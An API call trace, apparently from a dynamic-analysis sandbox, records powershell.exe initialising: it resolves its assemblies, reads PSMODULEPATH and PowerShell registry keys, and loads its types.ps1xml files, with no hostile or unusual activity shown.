	[0626.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0628.173] SetConsoleCtrlHandler (HandlerRoutine=0x2a068dc, Add=1) returned 1
	[0628.908] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0628.910] CoCreateGuid (in: pguid=0x16de50 | out: pguid=0x16de50*(Data1=0x7249cea, Data2=0x4789, Data3=0x4ab2, Data4=([0]=0x89, [1]=0x5a, [2]=0x50, [3]=0x69, [4]=0xaa, [5]=0x3c, [6]=0xc, [7]=0xb8))) returned 0x0
	[0628.912] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.912] CoTaskMemFree (pv=0x2f94d0) 
	[0628.916] WinSqmIsOptedIn () returned 0x0
	[0628.917] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.917] CoTaskMemFree (pv=0x2f94d0) 
	[0628.918] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.918] CoTaskMemFree (pv=0x2f94d0) 
	[0628.918] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.919] CoTaskMemFree (pv=0x2f94d0) 
	[0628.919] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.919] CoTaskMemFree (pv=0x2f94d0) 
	[0628.920] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.920] CoTaskMemFree (pv=0x2f94d0) 
	[0628.921] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.921] CoTaskMemFree (pv=0x2f94d0) 
	[0628.922] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.922] CoTaskMemFree (pv=0x2f94d0) 
	[0628.922] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.922] CoTaskMemFree (pv=0x2f94d0) 
	[0628.925] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.925] CoTaskMemFree (pv=0x2f94d0) 
	[0628.930] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.930] CoTaskMemFree (pv=0x2f94d0) 
	[0628.930] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.930] CoTaskMemFree (pv=0x2f94d0) 
	[0628.930] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0628.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.931] CoTaskMemFree (pv=0x2f94d0) 
	[0640.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0643.536] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0643.536] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0643.536] CoTaskMemFree (pv=0x2f94d0) 
	[0643.537] CoTaskMemAlloc (cb=0xcc) returned 0x1b8c8090
	[0643.537] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8c8090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0643.537] CoTaskMemFree (pv=0x1b8c8090) 
	[0643.537] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d9c8 | out: phkResult=0x16d9c8*=0x2f4) returned 0x0
	[0643.538] RegQueryValueExW (in: hKey=0x2f4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d94c, lpData=0x0, lpcbData=0x16d948*=0x0 | out: lpType=0x16d94c*=0x2, lpData=0x0, lpcbData=0x16d948*=0x6c) returned 0x0
	[0643.538] CoTaskMemAlloc (cb=0x70) returned 0x292070
	[0643.538] RegQueryValueExW (in: hKey=0x2f4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d91c, lpData=0x292070, lpcbData=0x16d918*=0x6c | out: lpType=0x16d91c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d918*=0x6c) returned 0x0
	[0643.538] CoTaskMemFree (pv=0x292070) 
	[0643.538] CoTaskMemAlloc (cb=0xcc) returned 0x1b8c8090
	[0643.538] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8c8090, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0643.538] CoTaskMemFree (pv=0x1b8c8090) 
	[0643.538] CoTaskMemAlloc (cb=0xcc) returned 0x1b8c8090
	[0643.538] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8c8090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0643.538] CoTaskMemFree (pv=0x1b8c8090) 
	[0643.541] RegCloseKey (hKey=0x2f4) returned 0x0
	[0643.541] CoTaskMemAlloc (cb=0xcc) returned 0x1b8c8090
	[0643.541] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8c8090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0643.541] CoTaskMemFree (pv=0x1b8c8090) 
	[0643.541] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d9c8 | out: phkResult=0x16d9c8*=0x2f4) returned 0x0
	[0643.541] RegQueryValueExW (in: hKey=0x2f4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d94c, lpData=0x0, lpcbData=0x16d948*=0x0 | out: lpType=0x16d94c*=0x0, lpData=0x0, lpcbData=0x16d948*=0x0) returned 0x2
	[0643.542] RegCloseKey (hKey=0x2f4) returned 0x0
	[0643.546] CoTaskMemAlloc (cb=0x20c) returned 0x2e5ae0
	[0643.547] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2e5ae0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0643.548] CoTaskMemFree (pv=0x2e5ae0) 
	[0643.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0643.549] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0643.561] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0643.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.561] CoTaskMemFree (pv=0x2f94d0) 
	[0643.563] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0643.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.563] CoTaskMemFree (pv=0x2f94d0) 
	[0643.567] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0643.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.567] CoTaskMemFree (pv=0x2f94d0) 
	[0643.567] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0643.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.567] CoTaskMemFree (pv=0x2f94d0) 
	[0643.569] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d7b8 | out: phkResult=0x16d7b8*=0x2fc) returned 0x0
	[0643.570] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x16d7cc, lpData=0x0, lpcbData=0x16d7c8*=0x0 | out: lpType=0x16d7cc*=0x1, lpData=0x0, lpcbData=0x16d7c8*=0x74) returned 0x0
	[0643.570] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x16d73c, lpData=0x0, lpcbData=0x16d738*=0x0 | out: lpType=0x16d73c*=0x1, lpData=0x0, lpcbData=0x16d738*=0x74) returned 0x0
	[0643.570] CoTaskMemAlloc (cb=0x78) returned 0x292070
	[0643.570] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x16d70c, lpData=0x292070, lpcbData=0x16d708*=0x74 | out: lpType=0x16d70c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d708*=0x74) returned 0x0
	[0643.570] CoTaskMemFree (pv=0x292070) 
	[0643.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0643.570] SetErrorMode (uMode=0x1) returned 0x1
	[0643.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d690 | out: lpFileInformation=0x16d690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0643.571] SetErrorMode (uMode=0x1) returned 0x1
	[0643.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0643.571] SetErrorMode (uMode=0x1) returned 0x1
	[0643.571] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d690 | out: lpFileInformation=0x16d690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0643.572] SetErrorMode (uMode=0x1) returned 0x1
	[0643.574] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0643.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.575] CoTaskMemFree (pv=0x2f94d0) 
	[0643.575] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0643.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.576] CoTaskMemFree (pv=0x2f94d0) 
	[0643.576] GetACP () returned 0x4e4
	[0645.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0645.667] SetErrorMode (uMode=0x1) returned 0x1
	[0645.668] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0645.669] GetFileType (hFile=0x314) returned 0x1
	[0645.669] SetErrorMode (uMode=0x1) returned 0x1
	[0645.669] GetFileType (hFile=0x314) returned 0x1
	[0645.673] ReadFile (in: hFile=0x314, lpBuffer=0x2cfecb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cfecb8*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0645.686] ReadFile (in: hFile=0x314, lpBuffer=0x2cfecb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cfecb8*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0645.686] ReadFile (in: hFile=0x314, lpBuffer=0x2cfecb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cfecb8*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0645.686] ReadFile (in: hFile=0x314, lpBuffer=0x2cfecb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cfecb8*, lpNumberOfBytesRead=0x16d5c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0645.686] ReadFile (in: hFile=0x314, lpBuffer=0x2cfe113, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cfe113*, lpNumberOfBytesRead=0x16d5c8*=0x0, lpOverlapped=0x0) returned 1
	[0645.686] ReadFile (in: hFile=0x314, lpBuffer=0x2cfecb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cfecb8*, lpNumberOfBytesRead=0x16d5c8*=0x0, lpOverlapped=0x0) returned 1
	[0645.689] CloseHandle (hObject=0x314) returned 1
	[0645.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0645.692] SetErrorMode (uMode=0x1) returned 0x1
	[0645.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d540 | out: lpFileInformation=0x16d540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0645.692] SetErrorMode (uMode=0x1) returned 0x1
	[0645.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0645.693] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d628 | out: phkResult=0x16d628*=0x314) returned 0x0
	[0645.694] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d5ac, lpData=0x0, lpcbData=0x16d5a8*=0x0 | out: lpType=0x16d5ac*=0x1, lpData=0x0, lpcbData=0x16d5a8*=0x56) returned 0x0
	[0645.694] CoTaskMemAlloc (cb=0x5a) returned 0x1b8caa70
	[0645.694] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d57c, lpData=0x1b8caa70, lpcbData=0x16d578*=0x56 | out: lpType=0x16d57c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d578*=0x56) returned 0x0
	[0645.694] CoTaskMemFree (pv=0x1b8caa70) 
	[0645.694] RegCloseKey (hKey=0x314) returned 0x0
	[0645.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0645.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0645.730] VirtualQuery (in: lpAddress=0x16c310, lpBuffer=0x16d1d0, dwLength=0x30 | out: lpBuffer=0x16d1d0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0647.726] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0647.726] GetFileType (hFile=0x314) returned 0x1
	[0647.727] SetErrorMode (uMode=0x1) returned 0x1
	[0647.727] GetFileType (hFile=0x314) returned 0x1
	[0647.727] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.731] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.731] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.731] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.732] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
